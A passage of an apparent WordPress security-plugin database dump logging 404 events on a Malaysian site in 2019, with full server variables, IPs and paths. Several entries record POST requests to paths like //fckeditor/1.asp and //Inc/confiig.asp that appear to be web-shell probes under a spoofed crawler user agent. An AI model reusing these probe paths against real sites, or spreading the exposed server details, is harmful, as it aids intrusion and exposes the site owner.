Firefox/21.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"45.252.189.14\";s:11:\"REMOTE_PORT\";s:5:\"39782\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XatIQrP2yel5jEccgdeCYwAAAYQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571506242.7156\";s:12:\"REQUEST_TIME\";s:10:\"1571506242\";}}','notice','2019-10-19 17:30:45','2019-10-19 17:30:43',35310880,37115384,'https://bintara.com.my/?page_id=18',1,0,'45.252.189.14'),(28420,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-n1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-n1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-n1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatQToq@uz@DI827WH6tIQAAAUk\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-n1/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.152\";s:11:\"REMOTE_PORT\";s:5:\"11016\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-n1/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-n1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XatQToq@uz@DI827WH6tIQAAAUk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571508302.6129\";s:12:\"REQUEST_TIME\";s:10:\"1571508302\";}}','notice','2019-10-19 18:05:07','2019-10-19 18:05:03',34288136,36086880,'https://bintara.com.my/toughbook-n1/',1,0,'157.55.39.152'),(28421,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-54/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-54/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-54/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatWHLP2yel5jEccgdeN8gAAAYU\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-54/\";s:11:\"REMOTE_ADDR\";s:12:\"157.55.39.98\";s:11:\"REMOTE_PORT\";s:4:\"2312\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-54/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-54/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XatWHLP2yel5jEccgdeN8gAAAYU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571509788.8934\";s:12:\"REQUEST_TIME\";s:10:\"1571509788\";}}','notice','2019-10-19 18:29:50','2019-10-19 18:29:49',33816240,35622120,'https://bintara.com.my/toughbook-54/',1,0,'157.55.39.98'),(28422,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//stlytime.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"124.167.222.227\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"124.167.222.227\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/stlytime.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/stlytime.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xatc4bP2yel5jEccgdeTnAAAAYY\";s:12:\"REDIRECT_URL\";s:13:\"/stlytime.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"62510\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/stlytime.asp\";s:10:\"SCRIPT_URL\";s:13:\"/stlytime.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xatc4bP2yel5jEccgdeTnAAAAYY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571511522.2497\";s:12:\"REQUEST_TIME\";s:10:\"1571511522\";}}','notice','2019-10-19 18:58:45','2019-10-19 18:58:42',35736336,37531328,'http://bintara.com.my//stlytime.asp',1,0,'124.167.222.227'),(28423,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//stlytime.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"122.198.53.70\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"122.198.53.70\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/stlytime.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/stlytime.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xatc6Yq@uz@DI827WH6v3AAAAVA\";s:12:\"REDIRECT_URL\";s:13:\"/stlytime.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"62733\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/stlytime.asp\";s:10:\"SCRIPT_URL\";s:13:\"/stlytime.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xatc6Yq@uz@DI827WH6v3AAAAVA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571511529.3517\";s:12:\"REQUEST_TIME\";s:10:\"1571511529\";}}','notice','2019-10-19 18:58:50','2019-10-19 18:58:49',35267288,37072504,'http://bintara.com.my//stlytime.asp',1,0,'122.198.53.70'),(28424,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//fckeditor/1.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"119.38.161.29\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"119.38.161.29\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/fckeditor/1.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/fckeditor/1.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xatc@bP2yel5jEccgdeTqAAAAZU\";s:12:\"REDIRECT_URL\";s:16:\"/fckeditor/1.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63147\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/fckeditor/1.asp\";s:10:\"SCRIPT_URL\";s:16:\"/fckeditor/1.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xatc@bP2yel5jEccgdeTqAAAAZU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571511545.3201\";s:12:\"REQUEST_TIME\";s:10:\"1571511545\";}}','notice','2019-10-19 18:59:07','2019-10-19 18:59:05',35341128,37145328,'http://bintara.com.my//fckeditor/1.asp',1,0,'119.38.161.29'),(28425,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//fckeditor/1.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"202.101.197.131\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"202.101.197.131\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/fckeditor/1.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/fckeditor/1.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatdAbVvTBqXFHRB7z8zwgAAABQ\";s:12:\"REDIRECT_URL\";s:16:\"/fckeditor/1.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63333\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/fckeditor/1.asp\";s:10:\"SCRIPT_URL\";s:16:\"/fckeditor/1.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatdAbVvTBqXFHRB7z8zwgAAABQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571511553.8132\";s:12:\"REQUEST_TIME\";s:10:\"1571511553\";}}','notice','2019-10-19 18:59:15','2019-10-19 18:59:14',35268640,37075168,'http://bintara.com.my//fckeditor/1.asp',1,0,'202.101.197.131'),(28426,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//Inc/testp.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"202.136.210.238\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"202.136.210.238\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/Inc/testp.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/Inc/testp.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatdDrP2yel5jEccgdeTtwAAAYA\";s:12:\"REDIRECT_URL\";s:14:\"/Inc/testp.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63628\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/Inc/testp.asp\";s:10:\"SCRIPT_URL\";s:14:\"/Inc/testp.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatdDrP2yel5jEccgdeTtwAAAYA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571511566.4402\";s:12:\"REQUEST_TIME\";s:10:\"1571511566\";}}','notice','2019-10-19 18:59:28','2019-10-19 18:59:26',35339312,37136880,'http://bintara.com.my//Inc/testp.asp',1,0,'202.136.210.238'),(28427,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//Inc/confiig.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"202.99.202.172\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"202.99.202.172\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/Inc/confiig.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/Inc/confiig.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatdKoq@uz@DI827WH6v6wAAAUU\";s:12:\"REDIRECT_URL\";s:16:\"/Inc/confiig.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"64199\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/Inc/confiig.asp\";s:10:\"SCRIPT_URL\";s:16:\"/Inc/confiig.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatdKoq@uz@DI827WH6v6wAAAUU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571511594.3129\";s:12:\"REQUEST_TIME\";s:10:\"1571511594\";}}','notice','2019-10-19 18:59:56','2019-10-19 18:59:54',35339728,37134232,'http://bintara.com.my//Inc/confiig.asp',1,0,'202.99.202.172'),(28428,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//Inc/confiig.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; 